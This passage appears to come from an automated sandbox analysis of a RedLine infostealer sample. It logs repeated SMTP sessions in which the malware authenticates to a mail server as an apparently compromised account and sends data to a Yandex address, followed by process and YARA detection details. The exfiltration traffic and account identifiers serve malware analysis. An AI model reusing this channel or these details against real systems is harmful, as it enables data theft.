                              Jul 1, 2024 20:27:19.827333927 CEST49739587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:27:20.215081930 CEST5874973979.170.44.32192.168.2.4221 mta2.hi.local closing connection
                              Jul 1, 2024 20:27:21.185137987 CEST5874974079.170.44.32192.168.2.4220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:21 +0100
                              Jul 1, 2024 20:27:21.185250044 CEST49740587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:27:21.374058008 CEST5874974079.170.44.32192.168.2.4250-mta2.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:27:21.374209881 CEST49740587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:27:21.562297106 CEST5874974079.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:27:21.754947901 CEST5874974079.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:27:21.755070925 CEST49740587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:27:21.943399906 CEST5874974079.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:27:21.943536043 CEST49740587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:27:22.140707970 CEST5874974079.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:27:22.145041943 CEST49740587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:27:22.436301947 CEST5874974079.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:27:23.068694115 CEST5874974079.170.44.32192.168.2.4250 OK id=1sOLkI-0000000DCM0-127b
                              Jul 1, 2024 20:27:32.946715117 CEST49740587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:27:33.354957104 CEST5874974079.170.44.32192.168.2.4221 mta2.hi.local closing connection
                              Jul 1, 2024 20:27:33.954459906 CEST5874974179.170.44.32192.168.2.4220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:33 +0100
                              Jul 1, 2024 20:27:33.954596996 CEST49741587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:27:34.147423029 CEST5874974179.170.44.32192.168.2.4250-mta2.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:27:34.153537989 CEST49741587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:27:34.339615107 CEST5874974179.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:27:34.530988932 CEST5874974179.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:27:34.532859087 CEST49741587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:27:34.718312025 CEST5874974179.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:27:34.720889091 CEST49741587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:27:35.546674967 CEST5874974279.170.44.32192.168.2.4220 mta3.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:35 +0100
                              Jul 1, 2024 20:27:35.546822071 CEST49742587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:27:35.735109091 CEST5874974279.170.44.32192.168.2.4250-mta3.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:27:35.735434055 CEST49742587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:27:35.923638105 CEST5874974279.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:27:36.117608070 CEST5874974279.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:27:36.121424913 CEST49742587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:27:36.310538054 CEST5874974279.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:27:36.310800076 CEST49742587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:27:36.511528015 CEST5874974279.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:27:36.511806011 CEST49742587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:27:36.705600023 CEST5874974279.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:27:37.346040964 CEST5874974279.170.44.32192.168.2.4250 OK id=1sOLkW-0000000ERZf-2ZRW
                              Jul 1, 2024 20:27:46.840518951 CEST49742587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:27:47.230300903 CEST5874974279.170.44.32192.168.2.4221 mta3.hi.local closing connection
                              Jul 1, 2024 20:27:48.020229101 CEST5874974379.170.44.32192.168.2.4220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:47 +0100
                              Jul 1, 2024 20:27:48.020366907 CEST49743587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:27:48.212055922 CEST5874974379.170.44.32192.168.2.4250-mta2.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:27:48.212327003 CEST49743587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:27:48.403609037 CEST5874974379.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:27:48.600611925 CEST5874974379.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:27:48.603403091 CEST49743587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:27:48.813664913 CEST5874974379.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:27:48.813854933 CEST49743587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:27:49.017674923 CEST5874974379.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:27:49.017973900 CEST49743587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:27:49.212156057 CEST5874974379.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:27:49.236172915 CEST49743587192.168.2.479.170.44.32.
                              Jul 1, 2024 20:27:49.831792116 CEST5874974379.170.44.32192.168.2.4250 OK id=1sOLkj-0000000DCaZ-0Uj8
                              Jul 1, 2024 20:27:51.809463978 CEST49743587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:27:52.205099106 CEST5874974379.170.44.32192.168.2.4221 mta2.hi.local closing connection
                              Jul 1, 2024 20:27:52.827761889 CEST5874974479.170.44.32192.168.2.4220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:52 +0100
                              Jul 1, 2024 20:27:52.827930927 CEST49744587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:27:53.032391071 CEST5874974479.170.44.32192.168.2.4250-mta4.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:27:53.032619953 CEST49744587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:27:53.224463940 CEST5874974479.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:27:53.422904015 CEST5874974479.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:27:53.423062086 CEST49744587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:27:53.615833044 CEST5874974479.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:27:53.615979910 CEST49744587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:27:53.815978050 CEST5874974479.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:27:53.816160917 CEST49744587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:27:54.008660078 CEST5874974479.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:27:54.627106905 CEST5874974479.170.44.32192.168.2.4250 OK id=1sOLkn-0000000A2g4-3qSW
                              Jul 1, 2024 20:27:59.008552074 CEST49744587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:27:59.403178930 CEST5874974479.170.44.32192.168.2.4221 mta4.hi.local closing connection
                              Jul 1, 2024 20:28:00.150458097 CEST5874974579.170.44.32192.168.2.4220 mta3.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:00 +0100
                              Jul 1, 2024 20:28:00.150966883 CEST49745587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:28:00.337574005 CEST5874974579.170.44.32192.168.2.4250-mta3.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:28:00.337758064 CEST49745587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:28:00.522360086 CEST5874974579.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:28:00.711060047 CEST5874974579.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:28:00.712580919 CEST49745587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:28:00.898240089 CEST5874974579.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:28:00.901314974 CEST49745587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:28:01.095300913 CEST5874974579.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:28:01.095416069 CEST49745587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:28:01.279144049 CEST5874974579.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:28:01.908507109 CEST5874974579.170.44.32192.168.2.4250 OK id=1sOLkv-0000000ERlv-0oBA
                              Jul 1, 2024 20:28:13.475375891 CEST49745587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:28:13.862019062 CEST5874974579.170.44.32192.168.2.4221 mta3.hi.local closing connection
                              Jul 1, 2024 20:28:14.490386009 CEST5874974679.170.44.32192.168.2.4220 mta1.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:14 +0100
                              Jul 1, 2024 20:28:14.490833044 CEST49746587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:28:14.685704947 CEST5874974679.170.44.32192.168.2.4250-mta1.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:28:14.686976910 CEST49746587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:28:14.880176067 CEST5874974679.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:28:15.079988956 CEST5874974679.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:28:15.080185890 CEST49746587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:28:15.275403976 CEST5874974679.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:28:15.275614023 CEST49746587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:28:15.475378990 CEST5874974679.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:28:15.475521088 CEST49746587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:28:15.672533035 CEST5874974679.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:28:16.601747990 CEST5874974779.170.44.32192.168.2.4220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:16 +0100
                              Jul 1, 2024 20:28:16.601891994 CEST49747587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:28:16.807550907 CEST5874974779.170.44.32192.168.2.4250-mta4.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:28:16.807796001 CEST49747587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:28:16.999671936 CEST5874974779.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:28:17.196358919 CEST5874974779.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:28:17.196614981 CEST49747587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:28:17.385592937 CEST5874974779.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:28:17.385744095 CEST49747587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:28:17.586522102 CEST5874974779.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:28:17.586688042 CEST49747587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:28:17.781030893 CEST5874974779.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:28:17.822735071 CEST49747587192.168.2.479.170.44.32.
                              Jul 1, 2024 20:28:18.412240982 CEST5874974779.170.44.32192.168.2.4250 OK id=1sOLlB-0000000A2si-2sDD
                              Jul 1, 2024 20:28:34.151602983 CEST49747587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:28:34.555474043 CEST5874974779.170.44.32192.168.2.4221 mta4.hi.local closing connection
                              Jul 1, 2024 20:28:35.168035030 CEST5874974879.170.44.32192.168.2.4220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:35 +0100
                              Jul 1, 2024 20:28:35.168200970 CEST49748587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:28:35.358902931 CEST5874974879.170.44.32192.168.2.4250-mta4.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:28:35.359085083 CEST49748587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:28:35.550868988 CEST5874974879.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:28:35.745289087 CEST5874974879.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:28:35.745492935 CEST49748587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:28:35.935261965 CEST5874974879.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:28:35.935412884 CEST49748587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:28:36.135417938 CEST5874974879.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:28:36.142765999 CEST49748587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:28:36.335314035 CEST5874974879.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:28:36.373159885 CEST49748587192.168.2.479.170.44.32.
                              Jul 1, 2024 20:28:36.972570896 CEST5874974879.170.44.32192.168.2.4250 OK id=1sOLlU-0000000A31G-11Q4
                              Jul 1, 2024 20:28:50.991621017 CEST49748587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:28:51.383745909 CEST5874974879.170.44.32192.168.2.4221 mta4.hi.local closing connection
                              Jul 1, 2024 20:28:52.580348969 CEST5874975079.170.44.32192.168.2.4220 mta3.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:52 +0100
                              Jul 1, 2024 20:28:52.580627918 CEST49750587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:28:52.770576954 CEST5874975079.170.44.32192.168.2.4250-mta3.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:28:52.770760059 CEST49750587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:28:52.962213993 CEST5874975079.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:28:53.162456989 CEST5874975079.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:28:53.162611961 CEST49750587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:28:53.352729082 CEST5874975079.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:28:53.352868080 CEST49750587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:28:54.391041040 CEST5874975179.170.44.32192.168.2.4220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:28:54 +0100
                              Jul 1, 2024 20:28:54.391273975 CEST49751587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:28:54.722778082 CEST5874975179.170.44.32192.168.2.4250-mta4.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:28:54.723278999 CEST49751587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:28:54.906481981 CEST5874975179.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:28:55.095117092 CEST5874975179.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:28:55.095407963 CEST49751587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:28:55.278851986 CEST5874975179.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:28:55.279068947 CEST49751587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:28:55.472872972 CEST5874975179.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:28:55.473031044 CEST49751587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:28:55.662342072 CEST5874975179.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:28:56.308284998 CEST5874975179.170.44.32192.168.2.4250 OK id=1sOLln-0000000A3BT-2Ofc
                              Jul 1, 2024 20:29:05.053231955 CEST49751587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:29:05.467690945 CEST5874975179.170.44.32192.168.2.4221 mta4.hi.local closing connection
                              Jul 1, 2024 20:29:06.132132053 CEST5874975279.170.44.32192.168.2.4220 mta4.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:06 +0100
                              Jul 1, 2024 20:29:06.132278919 CEST49752587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:29:06.336431980 CEST5874975279.170.44.32192.168.2.4250-mta4.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:29:06.339493990 CEST49752587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:29:06.675451040 CEST5874975279.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:29:06.870318890 CEST5874975279.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:29:06.870841026 CEST49752587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:29:07.062038898 CEST5874975279.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:29:07.062885046 CEST49752587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:29:07.271917105 CEST5874975279.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:29:07.272062063 CEST49752587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:29:07.464664936 CEST5874975279.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:29:08.091321945 CEST5874975279.170.44.32192.168.2.4250 OK id=1sOLlz-0000000A3H9-1Yun
                              Jul 1, 2024 20:29:09.642345905 CEST49752587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:29:10.034501076 CEST5874975279.170.44.32192.168.2.4221 mta4.hi.local closing connection
                              Jul 1, 2024 20:29:10.628614902 CEST5874975379.170.44.32192.168.2.4220 mta1.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:10 +0100
                              Jul 1, 2024 20:29:10.628832102 CEST49753587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:29:10.815536022 CEST5874975379.170.44.32192.168.2.4250-mta1.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:29:10.815969944 CEST49753587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:29:11.001250029 CEST5874975379.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:29:11.188497066 CEST5874975379.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:29:11.188714981 CEST49753587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:29:11.372123957 CEST5874975379.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:29:11.372385025 CEST49753587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:29:11.614816904 CEST5874975379.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:29:11.614967108 CEST49753587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:29:11.831549883 CEST5874975379.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:29:12.636617899 CEST5874975379.170.44.32192.168.2.4250 OK id=1sOLm3-00000004Bje-2zMB
                              Jul 1, 2024 20:29:18.418917894 CEST49753587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:29:18.807950974 CEST5874975379.170.44.32192.168.2.4221 mta1.hi.local closing connection
                              Jul 1, 2024 20:29:19.414141893 CEST5874975479.170.44.32192.168.2.4220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:19 +0100
                              Jul 1, 2024 20:29:19.418207884 CEST49754587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:29:19.606580973 CEST5874975479.170.44.32192.168.2.4250-mta2.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:29:19.607073069 CEST49754587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:29:19.806065083 CEST5874975479.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:29:19.999017000 CEST5874975479.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:29:19.999155045 CEST49754587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:29:20.188519955 CEST5874975479.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:29:20.188666105 CEST49754587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:29:20.392357111 CEST5874975479.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:29:20.395040035 CEST49754587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:29:20.583072901 CEST5874975479.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:29:21.193829060 CEST5874975479.170.44.32192.168.2.4250 OK id=1sOLmC-0000000DDKH-24oy
                              Jul 1, 2024 20:29:24.612020969 CEST49754587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:29:25.021388054 CEST5874975479.170.44.32192.168.2.4221 mta2.hi.local closing connection
                              Jul 1, 2024 20:29:25.655849934 CEST5874975579.170.44.32192.168.2.4220 mta1.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:29:25 +0100
                              Jul 1, 2024 20:29:25.656055927 CEST49755587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:29:25.840574980 CEST5874975579.170.44.32192.168.2.4250-mta1.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:29:25.842904091 CEST49755587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:29:26.043775082 CEST5874975579.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:29:26.234744072 CEST5874975579.170.44.32192.168.2.4235 Authentication succeeded

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:14:25:15
                              Start date:01/07/2024
                              Path:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\GkYUK8VCrO.exe"
                              Imagebase:0xaa0000
                              File size:1'623'552 bytes
                              MD5 hash:7D50650CD2BA63482D4CAF875AE65A8E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:14:25:15
                              Start date:01/07/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\GkYUK8VCrO.exe"
                              Imagebase:0x270000
                              File size:45'984 bytes
                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:14:25:16
                              Start date:01/07/2024
                              Path:C:\Users\user\Desktop\GkYUK8VCrO.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\GkYUK8VCrO.exe"
                              Imagebase:0xaa0000
                              File size:1'623'552 bytes
                              MD5 hash:7D50650CD2BA63482D4CAF875AE65A8E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:14:25:16
                              Start date:01/07/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\GkYUK8VCrO.exe"
                              Imagebase:0xe10000
                              File size:45'984 bytes
                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
